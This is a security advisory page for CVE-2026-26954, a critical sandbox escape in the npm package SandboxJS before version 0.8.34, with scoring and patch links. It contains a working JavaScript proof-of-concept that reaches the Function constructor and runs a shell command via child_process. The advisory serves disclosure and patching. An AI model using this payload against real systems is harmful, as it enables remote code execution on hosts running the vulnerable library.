CVE-2026-26954
CRITICAL10.0EPSS 0.10%SandboxJS affected by a Sandbox Escape
描述
### Summary It is possible to obtain arrays containing `Function`, which allows escaping the sandbox. ### Details There are various ways to get an array containing `Function`, e.g. ```js Object.entries(this).at(1) // [ 'Function', [Function: Function] ] Object.values(this).slice(1, 2) // [ [Function: Function] ] ``` Given an array containing `Function`, and `Object.fromEntries`, it is possible to construct `{[p]: Function}` where `p` is any constructible property. This can be used to escape the sandbox. ### PoC ```js const s = require('.').default; const sb = new s(); payload = ` const p = (async function () {})(); ({ "finally": p.finally, ...Object.fromEntries([['then', ...Object.values(this).slice(1)]]), }).finally('a=process.getBuiltinModule("child_process").execSync("ls", {stdio: "inherit"})')(); `; sb.compile(payload)().run(); ``` ### Impact Sandbox Escape -> RCE
受影響套件(1)
- npm/@nyariv/sandboxjsfrom 0, < 0.8.34
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
參考連結(5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-26954
- PATCHhttps://github.com/nyariv/SandboxJS
- WEBhttps://github.com/nyariv/SandboxJS/commit/e01505b1ea49f4f13956cd12b7ce01b83d2ee085
- WEBhttps://github.com/nyariv/SandboxJS/releases/tag/v0.8.34
- WEBhttps://github.com/nyariv/SandboxJS/security/advisories/GHSA-6r9f-759j-hjgv